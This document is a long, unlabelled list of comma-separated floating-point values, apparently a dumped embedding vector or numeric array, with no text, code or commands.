-0.006409251596778631, 0.013856839388608932, -0.020296994596719742, -0.004168794956058264, 0.01614364981651306, 0.011681278236210346, 0.00029010052094236016, -0.024005336686968803, -0.00807182490825653, -0.017157264053821564, 0.01105704065412283, -0.0026808225084096193, 0.005080428905785084, 0.017355041578412056, -0.003748516086488962, -0.021965747699141502, 0.00474358769133687, -0.03424036130309105, 0.016378512606024742, 0.018368655815720558, -0.008974188938736916, -0.009586065076291561, -0.01740448735654354, 0.0037299743853509426, -0.02194102481007576, -0.01996324211359024, 0.012577461078763008, 0.016020039096474648, -0.016242539510130882, 0.0172067079693079, -0.0015235106693580747, -0.016094205901026726, -0.015995316207408905, 0.01883837953209877, 0.03740481287240982, -0.002365613356232643, -0.02623034082353115, 0.01608184538781643, 0.010408081114292145, -0.010853081941604614, -0.009864190593361855, 0.016020039096474648, 0.0001915011234814301, -0.02296699956059456, -0.0004801530740223825, -0.0029697641730308533, 0.028183402493596077, -0.015884066000580788, -0.012806142680346966, 0.004759039264172316, -0.04192899167537689, 0.00039536337135359645, -0.01202739030122757, -0.01203975174576044, 0.015253648161888123, 0.00743522634729743, -0.005911715794354677, -0.030754519626498222, 0.006137306801974773, 0.034635916352272034, 0.007670088205486536, 0.004978449549525976, -0.02405478060245514, -0.009734398685395718, -0.010136135853827, -0.025463949888944626, 0.027367565780878067, 0.018010182306170464, 0.02585950680077076, 0.014709757640957832, -0.01068002637475729, -0.0367867574095726, -0.01918449066579342, -0.023906446993350983, -0.0004507953708525747, -0.0009440821595489979, -0.014598507434129715, 0.029246460646390915, -0.011236277408897877, 0.0010205666767433286, 0.0020272270776331425, -0.017256153747439384, 0.002699364209547639, -0.0037361548747867346, 0.019271019846200943, -0.011347527615725994, -0.002734902547672391, 0.006909877993166447, 0.0045210872776806355, 0.03181757777929306, 0.010129955597221851, 0.012274613603949547, -0.016650456935167313, -0.016106566414237022, -0.0016857506707310677, -0.013696144334971905, 0.004258413333445787, 0.014635590836405754, 0.0004477050679270178, 0.006631752010434866, 0.020395882427692413, 0.0034982028882950544, 0.0003874445101246238, -0.0009417644469067454, -0.015686288475990295, -0.006128035951405764, -0.028727291151881218, -0.00912870280444622, 0.03453702852129936, -0.006248557008802891, 0.014079339802265167, -0.003986468072980642, 0.013461282476782799, 0.013683782890439034, 0.024573948234319687, -0.0057726530358195305, -0.007058211602270603, -0.027268677949905396, 0.011050860397517681, -0.02585950680077076, 0.02739228866994381, 0.0020704912021756172, 0.01658865064382553, 0.0036496268585324287, -0.014314201660454273, -0.030136462301015854, 0.005312200635671616, -0.024413254112005234, 0.02186685800552368, -0.01914740726351738, 0.01487045269459486, -0.015426703728735447, 0.017392124980688095, 0.007966755889356136, -0.01391864474862814, -0.014116423204541206, -0.008368492126464844, 0.009369744919240475, 0.021236440166831017, 0.010735651478171349, -0.0018078169086948037, 0.004857928492128849, -0.01009905245155096, 0.022373665124177933, 0.01066148467361927, 0.03255924582481384, -0.013844477944076061, 0.018442822620272636, 0.007429045625030994, -0.017392124980688095, 0.004647789057344198, 0.02132296934723854, 0.006965503096580505, 0.016094205901026726, -0.0008552364306524396, 0.023214222863316536, 0.012348780408501625, 0.010123774409294128, -0.00727453175932169, -0.025983119383454323, -0.005275116767734289, 0.009932177141308784, 0.012682531028985977, 0.0077009908854961395, -0.0076515465043485165, -0.006699738558381796, 0.014474896714091301, -0.022200608626008034, 0.028949793428182602, -0.021372413262724876, -0.013683782890439034, 0.004904282744973898, 0.02085324563086033, 0.005111332051455975, 0.0023501620162278414, -0.01676170714199543, 0.004487094469368458, 0.0064834184013307095, 0.02561228536069393, -0.0051360540091991425, 0.0110694020986557, 0.010438983328640461, 0.022126441821455956, 0.0019345185719430447, 0.0016533025773242116, -0.019036157056689262, -0.012256071902811527, -0.008677520789206028, 0.013708505779504776, -0.0013411837862804532, 0.0007594376220367849, -0.024351447820663452, 0.00750321289524436, -0.002209553960710764, 0.009697315283119678, 0.005105151329189539, 0.015426703728735447, -0.010519331321120262, -0.003507473738864064, -0.0009232227457687259, -0.0037299743853509426, 0.005519249476492405, -0.01891254633665085, -0.004641608335077763, 0.00856627058237791, -0.02145894058048725, 0.012392044067382812, 0.01446253526955843, 0.000684884493239224, 0.011316624470055103, -0.007552657276391983, 0.00015152055129874498, 0.010352456010878086, 0.012905031442642212, 0.0002506994060240686, -0.015562676824629307, -0.02585950680077076, 0.01594587229192257, -0.003847405081614852, -0.001226843218319118, 0.027342844754457474, 0.005914805922657251, 0.008547728881239891, 0.004137891810387373, -0.0016455769073218107, -0.012293155305087566, 0.006551404949277639, 0.003318966366350651, -0.008807312697172165, 0.024845894426107407, -0.0018340842798352242, -0.012286974117159843, -0.0071200174279510975, -0.013646699488162994, -0.00743522634729743, 0.01117447204887867, 0.01893726736307144, 0.005114422179758549, -0.0015814534854143858, -0.016329066827893257, -0.006662655156105757, -0.01051315013319254, 0.01054405327886343, 0.01856643334031105, -0.00743522634729743, 0.0061743902042508125, -0.014994064345955849, -0.01342419907450676, -0.009722037240862846, 0.0029960316605865955, -0.010778915137052536, -0.0020689459051936865, -0.02991396188735962, 0.002858513966202736, 0.005166957154870033, -0.005840639118105173, 0.01571100950241089, 0.0033745914697647095, -0.003334417939186096, 0.019617130979895592, -0.008813493885099888, -0.006501960102468729, -0.01478392444550991, -0.0018279037903994322, 0.026477564126253128, -0.004706504289060831, -0.020148660987615585, 0.008665160275995731, 0.0021369322203099728, 0.0007644593133591115, -0.005108241457492113, 0.009796204045414925, 0.02459867112338543, 0.011026137508451939, 0.002849243115633726, 0.000878413615282625, -0.012620724737644196, -0.011415514163672924, 0.001220662728883326, 0.010420441627502441, 0.004864109214395285, -0.002952767536044121, -0.007762796711176634, 0.006335084792226553, 0.008665160275995731, -0.0010097507620230317, 0.010624401271343231, -0.004001919645816088, 0.013411838561296463, 0.021236440166831017, -0.017639348283410072, 0.016205456107854843, -0.007107655983418226, 0.02912284806370735, 0.01117447204887867, 0.01451198011636734, -0.025117838755249977, -0.012237530201673508, 0.014586146920919418, -0.004607615526765585, 0.012392044067382812, 0.014091701246798038, -0.0007891816203482449, -0.0014964706497266889, 0.02225005440413952, -0.008331408724188805, -0.0006987907690927386, 0.014277118258178234, 0.01495698094367981, 0.000540413660928607, 0.0018866191385313869, -0.008733145892620087, 0.01148349978029728, -0.015661565586924553, -0.009023632854223251, -0.01541434321552515, -0.003220077371224761, 0.015352536924183369, 0.019097963348031044, 0.01112502720206976, 0.003723793663084507, 0.0021400225814431906, 0.018071988597512245, 0.001183579210191965, -0.017157264053821564, -0.0023470716550946236, 0.0028415173292160034, 0.02456158772110939, -0.008034741505980492, 0.023090612143278122, 0.011743084527552128, -0.0183933787047863, -0.007874047383666039, 0.0007497804472222924, -0.006656474433839321, -0.0011704455828294158, -0.02493242174386978, -0.0037917799782007933, 0.012843226082623005, 0.013238782063126564, 0.004487094469368458, -0.01812143251299858, 0.005942618474364281, -0.013411838561296463, 0.013992811553180218, -0.00016629598394501954, 0.006433974020183086, -0.024264920502901077, 0.014363645575940609, -0.003634175518527627, -0.002248182659968734, 0.00948717538267374, -0.02548867277801037, -0.034116748720407486, -0.008529187180101871, 0.011891418136656284, 0.0007242856081575155, 0.0015760455280542374, -0.0015266009140759706, 0.005482166074216366, -0.022979361936450005, 0.027070898562669754, -0.009332661516964436, 0.004780671559274197, -0.017181986942887306, -0.005747930612415075, 0.0030176634900271893, -0.016378512606024742, 0.019913798198103905, 0.0002085942542180419, 0.003909210674464703, 0.007472309749573469, 0.01531545352190733, -0.011279541067779064, 0.00286160409450531, -0.013003920204937458, -0.0024274191819131374, 0.011848153546452522, -0.002654555020853877, 0.024882977828383446, -0.003921572118997574, -0.010803637094795704, 0.006211473606526852, -0.0182203222066164, -0.009054535999894142, 0.0005964250885881484, -0.006619391031563282, 0.037627313286066055, 0.01662573404610157, -0.00863425713032484, 0.004635428078472614, 0.02262088842689991, -0.000020726640286738984, 0.020692549645900726, -0.009153424762189388, -0.02077907882630825, -0.013003920204937458, 0.01699656993150711, 0.021829774603247643, -0.005327651742845774, 0.006372168194502592, 0.0023192591033875942, -0.012175723910331726, -0.03777564689517021, -0.01168745942413807, 0.01391864474862814, -0.00143543747253716, 0.003671258920803666, -0.0172067079693079, 0.010902526788413525, -0.012756697833538055, 0.03567425161600113, -0.004842476919293404, 0.006526682525873184, 0.012682531028985977, -0.028232846409082413, 0.01571100950241089, -0.005707757081836462, 0.0005906307487748563, -0.005806645844131708, 0.019159769639372826, -0.026798954233527184, 0.006866613868623972, 0.023053528741002083, -0.010939610190689564, -0.0013821300817653537, 0.002496950561180711, -0.013078087009489536, -0.017503375187516212, 0.0059611601755023, 0.015525593422353268, 0.006916058715432882, 0.008955647237598896, 0.014314201660454273, -0.007898769341409206, -0.0048270258121192455, -0.007262170314788818, 0.02623034082353115, 0.01781240478157997, -0.02000032551586628, 0.009666412137448788, 0.004663240630179644, 0.011260999366641045, 0.01110648550093174, 0.008955647237598896, 0.005992063321173191, 0.02937007136642933, -0.027886735275387764, 0.012818503193557262, 0.013572532683610916, 0.025637006387114525, 0.012558919377624989, -0.01003106590360403, -0.015179481357336044, 0.015550315380096436, -0.0007435998995788395, 0.015055869705975056, -0.013226420618593693, -0.010445164516568184, -0.0017877300269901752, 0.008189256303012371, -0.008770229294896126, -0.0020658557768911123, -0.004286225885152817, 0.0016486671520397067, 0.006409251596778631, 0.032930079847574234, -0.00037083422648720443, 0.004366572946310043, 0.008232519961893559, -0.02159491367638111, 0.005769562441855669, 0.012645447626709938, 0.00718800351023674, -0.0330536924302578, 0.013226420618593693, 0.02339963987469673, 0.028900347650051117, -0.005426540970802307, -0.012490932829678059, 0.029765628278255463, -0.0028816910926252604, -0.007150920107960701, -0.014091701246798038, 0.015575038269162178, -0.0018109071534126997, 0.008764049038290977, 0.003396223532035947, 0.0023532521445304155, 0.00483011594042182, 0.008084186352789402, -0.01112502720206976, -0.015228926204144955, 0.026205619797110558, -0.001759917475283146, -0.027367565780878067, -0.01765170879662037, 0.010092872194945812, -0.0038906692061573267, -0.00911634135991335, 0.012719614431262016, 0.012707252986729145, 0.006854252889752388, 0.011477319523692131, 0.0010846900986507535, -0.018628239631652832, -0.0036125434562563896, -0.012194265611469746, 0.011267180554568768, -0.014610868878662586, 0.007268351037055254, -0.006341265514492989, 0.0023857003543525934, 0.015599760226905346, -0.0229917224496603, -0.021743247285485268, 0.007336337119340897, 0.0023810649290680885, 0.009851829148828983, 0.006022966001182795, 0.005825187545269728, -0.00602914672344923, -0.028109235689044, 0.00959224533289671, -0.004493274725973606, -0.013115170411765575, 0.0018449003109708428, 0.010389539413154125, -0.003393133170902729, 0.012528016231954098, -0.0022744499146938324, -0.005874632392078638, -0.002248182659968734, 0.007194184232503176, -0.002282175701111555, -0.01396808959543705, -0.02749117836356163, -0.0306556299328804, -0.005615048576146364, 0.0014161232393234968, -0.020210465416312218, -0.006520501803606749, 0.006520501803606749, 0.01531545352190733, -0.006594668608158827, -0.010785095393657684, 0.01614364981651306, -0.010012524202466011, 0.0013991267187520862, 0.022188248112797737, 0.00048710621194913983, 0.020086854696273804, 0.023288389667868614, 0.028628403320908546, -0.01022266410291195, -0.026255063712596893, 0.005757201462984085, 0.016613373532891273, -0.01289266999810934, -0.004514907021075487, 0.012348780408501625, 0.00858481228351593, 0.020272271707654, -0.008665160275995731, -0.005519249476492405, -0.02937007136642933, -0.010927248746156693, 0.015760455280542374, 0.0033313275780528784, -0.00008783170051174238, 0.012744336389005184, -0.016539206728339195, 0.0429178811609745, 0.014759202487766743, -0.027441732585430145, -0.005896264221519232, -0.01775059849023819, 0.004416017793118954, -0.008183075115084648, 0.006749182939529419, -0.005843729712069035, 0.008065644651651382, 0.014635590836405754, 0.003986468072980642, 0.0023161687422543764, -0.012602183036506176, 0.0011410878505557775, -0.02667534351348877, -0.02370866946876049, 0.01794837787747383, -0.005846819840371609, 0.01095197070389986, -0.009944537654519081, -0.013251143507659435, 0.01856643334031105, -0.024190753698349, -0.023313112556934357, -0.018900183960795403, -0.0013357758289203048, -0.017453931272029877, 0.01724379137158394, -0.011273360811173916, -0.02173088677227497, 0.0067059192806482315, 0.001719743711873889, 0.01352308876812458, 0.007898769341409206, 0.009542801417410374, 0.007509393151849508, -0.009697315283119678, -0.006792447064071894, -0.0056892153806984425, -0.008164533413946629, -0.008473562076687813, -0.021446580067276955, -0.007323976140469313, 0.004780671559274197, -0.00921523105353117, 0.00016774455434642732, -0.02541450597345829, -0.008047102950513363, -0.0022018281742930412, 0.007886407896876335, 0.00032235539401881397, -0.007459948770701885, 0.011755445040762424, -0.015896428376436234, -0.004514907021075487, 0.006637932732701302, -0.004422198049724102, 0.030087018385529518, -0.009320300072431564, 0.021310606971383095, 0.0058560906909406185, -0.011328985914587975, 0.004796122666448355, 0.04108843207359314, -0.0052411239594221115, 0.005265845917165279, 0.015921149402856827, -0.013053365051746368, -0.021718524396419525, 0.00017856054182630032, 0.006239286158233881, -0.008640437386929989, -0.02613145299255848, -0.010995235294103622, -0.0007374193519353867, -0.033127859234809875, -0.023362556472420692, -0.0024598671589046717, -0.0052411239594221115, 0.000602991902269423, -0.006953142117708921, 0.0313478522002697, -0.007070572581142187, 0.013609616085886955, -0.00578192388638854, 0.016094205901026726, 0.003105736803263426, -0.01393100619316101, -0.013671422377228737, -0.01058113668113947, -0.004694143310189247, -0.02551339566707611, 0.009542801417410374, -0.022534361109137535, -0.0020272270776331425, -0.005346193443983793, 0.007280712015926838, 0.02885090373456478, 0.0024768635630607605, 0.01866532303392887, -0.0005840639350935817, 0.0072868927381932735, -0.002160109346732497, 0.004786851815879345, 0.021718524396419525, -0.006786266341805458, -0.0042120590806007385, 0.003025389276444912, 0.007194184232503176, -0.014351285062730312, -0.024042420089244843, 0.013869200833141804, -0.0063536264933645725, -0.002163199707865715, 0.0035352862905710936, 0.010395719669759274, -0.0042738644406199455, 0.0165268462151289, 0.010673845186829567, 0.007787519134581089, 0.02081616222858429, -0.002449051011353731, 0.016922403126955032, -0.017491014674305916, 0.0004654742078855634, -0.022645611315965652, 0.018010182306170464, 0.0038999400567263365, -0.012781419791281223, 0.010599678382277489, -0.011773986741900444, -0.02017338201403618, 0.0026730967219918966, -0.007589740678668022, 0.005590326152741909, 0.005649041384458542, 0.022979361936450005, -0.018306849524378777, -0.007150920107960701, 0.0059735216200351715, 0.013906284235417843, 0.012367322109639645, 0.002404242055490613, 0.009091619402170181, 0.0027271767612546682, -0.011817251332104206, -0.0008196981507353485, -0.025562839582562447, -0.010556414723396301, 0.007515573874115944, 0.0011542215943336487, -0.038888148963451385, 0.0068975165486335754, -0.02374575287103653, 0.0034518486354500055, 0.010259747505187988, 0.006971683818846941, 0.009864190593361855, 0.028529513627290726, 0.028183402493596077, 0.007354878820478916, 0.00826342310756445, -0.003971016500145197, 0.010803637094795704, -0.0010337004205211997, 0.012905031442642212, -0.0014215311966836452, 0.024882977828383446, -0.019901437684893608, 0.010321552865207195, -0.008417936973273754, 0.02000032551586628, -0.0035012932494282722, 0.007478490471839905, -0.0008853667532093823, -0.009919815696775913, 0.006427793297916651, 0.0024335996713489294, -0.012744336389005184, -0.007311615161597729, 0.01600767858326435, 0.007694810163229704, 0.020296994596719742, 0.016329066827893257, -0.013621977530419827, 0.00483011594042182, 0.0018588065868243575, 0.0027858922258019447, 0.009888912551105022, 0.00745376804843545, 0.016601013019680977, -0.0120953768491745, 0.007045850623399019, 0.0029249549843370914, 0.0003839679411612451, 0.019481157884001732, -0.005472895223647356, 0.005423450842499733, -0.017960738390684128, -0.015389620326459408, 0.002445960883051157, -0.009845648892223835, 0.011007595807313919, 0.015191842801868916, -0.013436560519039631, -0.006773905362933874, -0.020976856350898743, 0.04160759970545769, -0.006100223399698734, -0.025080755352973938, -0.007602101657539606, -0.019777825102210045, 0.01351072732359171, -0.0026004749815911055, -0.04244815930724144, -0.0009131793049164116, 0.001881983713246882, -0.015661565586924553, 0.022979361936450005, 0.001329595223069191, 0.024067141115665436, -0.02221297100186348, 0.0011186832562088966, -0.008417936973273754, 0.001270107226446271, -0.007874047383666039, -0.009171966463327408, -0.008930924348533154, 0.0002132296795025468, 0.002121480880305171, -0.015760455280542374, 0.01873948983848095, -0.015686288475990295, 0.014981702901422977, 0.019604770466685295, -0.02568645216524601, 0.01594587229192257, 0.017911294475197792, -0.01877657324075699, 0.011545306071639061, -0.014141145162284374, 0.014178228564560413, 0.0033715013414621353, -0.00529674906283617, -0.012181904166936874, -0.022571444511413574, 0.0008706878870725632, -0.012682531028985977, 0.007985297590494156, -0.02173088677227497, 0.017552820965647697, -0.02351089008152485, 0.00019468797836452723, 0.0019947791006416082, -0.000011648927284113597, 0.003107281867414713, 0.004737407434731722, -0.016835873946547508, 0.02285574935376644, -0.01584698259830475, 0.0033838623203337193, -0.0060353269800543785, -0.002782801864668727, -0.007249809335917234, -0.0023130786139518023, 0.014858091250061989, -0.002952767536044121, 0.021483663469552994, -0.039432041347026825, 0.012657808139920235, -0.015748094767332077, 0.014091701246798038, 0.019567687064409256, -0.006798627786338329, -0.015896428376436234, -0.01713254116475582, 0.0015644569648429751, 0.004524177871644497, -0.006576126907020807, -0.02558756247162819, 0.007373420521616936, -0.0018557163421064615, 0.008906202390789986, 0.003062472678720951, -0.01645267941057682, -0.0011843518586829305, -0.013535449281334877, -0.014709757640957832, -0.007113836705684662, -0.017837125808000565, 0.006242376286536455, -0.003303515026345849, -0.0007598238880746067, 0.018146155402064323, -0.02875201404094696, -0.005482166074216366, 0.01100141555070877, 0.006996405776590109, 0.0048393867909908295, 0.009277036413550377, 0.04061871021986008, 0.0012438398553058505, 0.0017351951682940125, 0.007126197684556246, -0.01063058152794838, -0.02292991615831852, 0.0071200174279510975, 0.00807182490825653, 0.0015505506889894605, 0.0041069891303777695, 0.00856627058237791, -0.014944619499146938, -0.00253403396345675, 0.015290731564164162, 0.022299498319625854, -0.03206479921936989, 0.004919734317809343, 0.008708423934876919, -0.0004917416372336447, 0.014240034855902195, -0.010550233535468578, 0.0035847309045493603, 0.0021786510478705168, 0.016069483011960983, 0.002581933280453086, 0.014178228564560413, -0.00215856428258121, 0.003054747125133872, -0.002079762052744627, -0.0032602509018033743, 0.013300588354468346, -0.008232519961893559, -0.0037701481487601995, 0.0008390124421566725, 0.00807182490825653, 0.004644698929041624, -0.0023980613332241774, -0.01306572649627924, -0.023226583376526833, -0.006810988765209913, 0.003098011016845703, 0.027515899389982224, 0.007880227640271187, -0.01451198011636734, 0.005924076773226261, 0.0038504954427480698, 0.011848153546452522, 0.0018835288938134909, -0.003059382550418377, -0.016971847042441368, -0.0028260659892112017, 0.03072979673743248, 0.0032942441757768393, 0.011291902512311935, -0.013745589181780815, 0.015587398782372475, -0.005170047283172607, 0.0068975165486335754, -0.010420441627502441, 0.008417936973273754, 0.002858513966202736, 0.00912870280444622, 0.01454906351864338, -0.015352536924183369, 0.010438983328640461, -0.011217735707759857, 0.004570532124489546, 0.016069483011960983, -0.01893726736307144, 0.00546671450138092, -0.014388368465006351, 0.0004774490662384778, 0.0010089781135320663, -0.0023779745679348707, 0.011909959837794304, 0.00014418111823033541, 0.02312769554555416, -0.0008475107606500387, 0.007935852743685246, -0.004774490837007761, 0.020890329033136368, -0.004691053181886673, -0.02040824480354786, -0.004746678285300732, -0.006372168194502592, 0.020630745217204094, -0.024722281843423843, -0.015550315380096436, -0.004619976505637169, 0.037454258650541306, 0.002251272788271308, -0.007688629906624556, 0.017565181478857994, 0.013844477944076061, 0.013671422377228737, 0.014227673411369324, 0.007799880113452673, 0.01441309042274952, -0.0025154922623187304, 0.014944619499146938, -0.014858091250061989, -0.02248491533100605, 0.005355464294552803, 0.003091830527409911, -0.017008930444717407, 0.011211555451154709, -0.010303011164069176, -0.010451344773173332, -0.006625571753829718, 0.002161654643714428, 0.012206627056002617, -0.004218239337205887, -0.00007329770596697927, -0.023350195959210396, -0.005015532951802015, -0.0021415676455944777, -0.002028772374615073, 0.012731974944472313, -0.012515655718743801, 0.004718865733593702, 0.019493520259857178, -0.00001909699676616583, 0.02657645381987095, 0.01396808959543705, -0.0033251470886170864, 0.007787519134581089, 0.012441488914191723, -0.00700876722112298, -0.007070572581142187, 0.00020936682994943112, -0.008380853570997715, -0.009802385233342648, 0.02432672493159771, 0.015760455280542374, -0.003133549354970455, -0.023758113384246826, -0.013844477944076061, -0.004382024519145489, -0.004548899829387665, 0.01757754199206829, 0.01730559766292572, -0.004657059907913208, -0.0003542239428497851, 0.032583966851234436, -0.009586065076291561, -0.004385114647448063, 0.022101720795035362, 0.0014702032785862684, 0.006060049403458834, 0.018109071999788284, -0.031026463955640793, -0.007880227640271187, 0.017355041578412056, 0.004456191323697567, 0.012966836802661419, -0.001328050158917904, -0.02432672493159771, 0.021310606971383095, -0.006996405776590109, 0.012867948040366173, 0.010667664930224419, -0.037083424627780914, 0.01203975174576044, 0.011761626228690147, -0.010340094566345215, 0.007979116402566433, 0.00014456741337198764, -0.013795033097267151, 0.014301840215921402, 0.00815835315734148, -0.006996405776590109, -0.024400893598794937, 0.00700876722112298, -0.009932177141308784, -0.005210220813751221, 0.004579802975058556, -0.025735896080732346, 0.0004565896524582058, 0.014672674238681793, 0.017960738390684128, 0.002337800804525614, -0.0024552317336201668, 0.01289266999810934, -0.0077009908854961395, 0.012237530201673508, -0.009783843532204628, 0.021421857178211212, -0.030309518799185753, -0.013461282476782799, 0.013572532683610916, 0.008869118988513947, 0.014709757640957832, 0.0045087262988090515, 0.0013404112542048097, -0.0032757024746388197, 0.0023486167192459106, 0.007027308922261, -0.01391864474862814, -0.012966836802661419, 0.01003106590360403, 0.012633086182177067, -0.008213978260755539, -0.01301628164947033, -0.010432803072035313, -0.012348780408501625, 0.012002668343484402, -0.0029759446624666452, -0.0006006741896271706, -0.002172470558434725, 0.0011217736173421144, -0.0036187241785228252, -0.003263341262936592, 0.01754045858979225, 0.019876714795827866, 0.008096547797322273, 0.008572451770305634, -0.004851747769862413, -0.0008042467525228858, 0.00919668935239315, 0.005176228005439043, -0.0009433095692656934, -0.01068002637475729, 0.00953662022948265, 0.009345022961497307, 0.00768244918435812, -0.020296994596719742, 0.0024397801607847214, 0.008312867023050785, 0.005448172800242901, -0.004264593590050936, -0.014734480530023575, -0.007039669901132584, -0.017181986942887306, -0.006106403656303883, -0.005312200635671616, 0.03750370070338249, 0.02337491884827614, -0.007577379699796438, -0.0029543128330260515, -0.008349950425326824, -0.01598295569419861, 0.004487094469368458, 0.009839468635618687, 0.01955532468855381, 0.003223167499527335, 0.017256153747439384, 0.008677520789206028, -0.018826017156243324, 0.016514483839273453, 0.015760455280542374, 0.010840720497071743, -0.013214060105383396, 0.01491989754140377, 0.008986549451947212, -0.016551567241549492, 0.016786430031061172, 0.003507473738864064, -0.01531545352190733, -0.014363645575940609, -0.021273523569107056, 0.009246133267879486, 0.003547647502273321, -0.01972838118672371, -0.008411756716668606, -0.01571100950241089, -0.017317958176136017, -0.0024675927124917507, -0.013486005365848541, -0.009419189766049385, -0.0025154922623187304, 0.00748467119410634, -0.011285722255706787, -0.003637265879660845, 0.007589740678668022, 0.00006938655860722065, -0.015266009606420994, -0.010735651478171349, -0.01587170548737049, 0.0081768948584795, -0.020803799852728844, -0.0306556299328804, -0.014561424031853676, 0.018813656643033028, -0.00524730421602726, 0.009666412137448788, -0.02050713263452053, 0.012942114844918251, 0.019258657470345497, 0.00863425713032484, -0.0002228868252132088, -0.008213978260755539, 0.0032880634535104036, 0.00433567026630044, 0.02102630026638508, 0.015216564759612083, 0.0077133518643677235, -0.01495698094367981, -0.02180505357682705, -0.021038662642240524, -0.0014702032785862684, 0.012478572316467762, 0.0062361955642700195, -0.008961827494204044, -0.0056428611278533936, -0.030977020040154457, 0.007966755889356136, 0.026798954233527184, 0.012410585768520832, -0.012540377676486969, -0.01870240643620491, 0.016563929617404938, -0.021248802542686462, 0.013078087009489536, 0.024858254939317703, -0.001878893468528986, -0.006162028759717941, -0.022237693890929222, -0.008992730639874935, -0.012410585768520832, -0.0008482832927256823, -0.004786851815879345, -0.001548232976347208, -0.018578795716166496, 0.02409186400473118, -0.007373420521616936, 0.006230015307664871, -0.002498495625331998, 0.02766423486173153, 0.018516989424824715, -0.01255273912101984, 0.004168794956058264, -0.012651627883315086, 0.010741831734776497, -0.005729388911277056, 0.0010097507620230317, -0.006239286158233881, 0.01682351343333721, 0.009790023788809776, 0.024240197613835335, 0.003108826931566, -0.01442545186728239, -0.015018786303699017, -0.012651627883315086, -0.004208968486636877, 0.010896345600485802, 0.0017274694982916117, 0.012855586595833302, 0.006891336292028427, -0.0017738237511366606, 0.014635590836405754, 0.0240176972001791, 0.008714604191482067, -0.024648115038871765, -0.024314364418387413, 0.0016100386856123805, -0.03451230749487877, 0.012558919377624989, -0.016366150230169296, 0.010327733121812344, -0.022299498319625854, -0.009462453424930573, -0.007311615161597729, 0.006440154742449522, 0.01604476198554039, -0.009474814869463444, 0.015401981770992279, 0.004740497563034296, 0.007719532586634159, -0.0020782167557626963, -0.012633086182177067, 0.015191842801868916, -0.020383521914482117, -0.004558170679956675, -0.015031147748231888, -0.04192899167537689, 0.0012840135022997856, 0.00500008137896657, 0.00745376804843545, 0.011823431588709354, 0.03045785240828991, 0.008399395272135735, 0.017626987770199776, 0.010284469462931156, 0.02650228701531887, 0.016378512606024742, -0.014437813311815262, -0.02033407799899578, 0.006681196857243776, 0.005098970606923103, 0.002394971204921603, -0.005092790350317955, -0.0027240864001214504, 0.014351285062730312, 0.030680352821946144, -0.002907958347350359, 0.025031311437487602, 0.006313452962785959, 0.020185744389891624, 0.0034178555943071842, 0.01197794545441866, -0.0002132296795025468, -0.014882814139127731, 0.001993234036490321, 0.032237857580184937, -0.018764212727546692, -0.0025587561540305614, 0.012237530201673508, 0.006576126907020807, 0.008529187180101871, 0.016094205901026726, 0.021817414090037346, -0.001119455904699862, -0.0011457232758402824, -0.020111577585339546, 0.008040922693908215, -0.02077907882630825, -0.0000774502768763341, 0.0014763837680220604, -0.011409332975745201, -0.0013303678715601563, 0.009827107191085815, -0.0021400225814431906, 0.010815998539328575, -0.011879056692123413, -0.015884066000580788, -0.0012322512920945883, 0.005995153449475765, 0.007138559129089117, -0.025735896080732346, 0.01699656993150711, -0.0014671129174530506, 0.02225005440413952, 0.00858481228351593, 0.01794837787747383, 0.001971601974219084, -0.014190590009093285, -0.004310947842895985, -0.0010058878688141704, 0.0026421938091516495, 0.008640437386929989, 0.00406990572810173, -0.0011604020837694407, -0.024895338341593742, -0.018133794888854027, 0.0018974351696670055, -0.002000959822908044, 0.0050742486491799355, 0.013461282476782799, -0.03624286502599716, 0.005234943237155676, -0.02310297265648842, -0.01594587229192257, -0.0003009165229741484, -0.007385781966149807, -0.025884229689836502, -0.004700324032455683, 0.0006257827626541257, -0.011260999366641045, -0.012596002779901028, -0.007657726760953665, -0.006155848503112793, 0.004039003048092127, -0.035921476781368256, 0.0016764798201620579, 0.004539628978818655, 0.00015943941252771765, -0.011656556278467178, 0.0064710574224591255, -0.0019901436753571033, -0.022460194304585457, -0.0028940520714968443, 0.0017274694982916117, -0.005312200635671616, -0.013708505779504776, -0.023832280188798904, 0.03532814234495163, 0.000407917657867074, 0.003105736803263426, -0.026180896908044815, 0.011458777822554111, 0.03246035799384117, -0.0050896997563540936, 0.007385781966149807, 0.01482100784778595, -0.007694810163229704, -0.010809818282723427, 0.006001334171742201, -0.008640437386929989, 0.00167338945902884, 0.008145991712808609, -0.0031922648195177317, 0.01587170548737049, 0.008523006923496723, 0.02407950349152088, -0.010136135853827, -0.002697819145396352, -0.0012901941081508994, -0.006922238972038031, 0.000183871976332739, -0.019777825102210045, 0.00175682723056525, 0.005899354815483093, 0.007861685939133167, -0.021780330687761307, 0.019332824274897575, 0.021409496665000916, 0.01911032386124134, -0.019777825102210045, 0.002160109346732497, 0.008590993471443653, 0.007027308922261, 0.003597092116251588, -0.0048270258121192455, -0.03018590621650219, -0.017861848697066307, 0.0011472684564068913, 0.026353953406214714, -0.0052411239594221115, -0.015055869705975056, -0.008590993471443653, 0.02909812703728676, 0.0010522421216592193, 0.0016285803867504, -0.01600767858326435, 0.0138815613463521, 0.0016950215213000774, -0.010828359983861446, -0.0013852203264832497, 0.0031629069708287716, -0.017280874773859978, 0.038171205669641495, -0.005355464294552803, 0.010303011164069176, -0.011829611845314503, -0.004233690910041332, 0.011100304313004017, -0.004777580965310335, -0.013782672584056854, 0.012361140921711922, -0.031496189534664154, 0.0012554284185171127, -0.007633004803210497, 0.010556414723396301, 0.010327733121812344, 0.027985623106360435, 0.022472554817795753, -0.006032236851751804, -0.009066897444427013, -0.004536538850516081, -0.0030933755915611982, -0.011205374263226986, 0.015105314552783966, 0.003142820205539465, -0.004941366147249937, 0.017219070345163345, -0.03196591138839722, 0.03389424830675125, 0.0035600087139755487, -0.005389457568526268, -0.013090448454022408, -0.0024768635630607605, -0.011366069316864014, 0.004691053181886673, -0.01239822432398796, -0.0060353269800543785, 0.00750321289524436, 0.009042174555361271, 0.009289397858083248, 0.005105151329189539, -0.004134801682084799, 0.002523218048736453, -0.012231349013745785, 0.011916140094399452, 0.009697315283119678, -0.007194184232503176, -0.005472895223647356, 0.0000897148420335725, -0.004814664367586374, -0.00750321289524436, -0.0046385182067751884, 0.0013512272853404284, 0.02302880585193634, 0.015537954866886139, 0.010463706217706203, 0.024957144632935524, -0.030878130346536636, 0.02828229032456875, 0.005046436097472906, 0.010247386060655117, -0.017466291785240173, 0.0047219558618962765, 0.0025015859864652157, -0.009715856984257698, 0.01297919824719429, -0.028702570125460625, -0.02568645216524601, 0.047714006155729294, 0.00819543655961752, -0.013115170411765575, 0.005843729712069035, 0.023226583376526833, 0.003665078431367874, 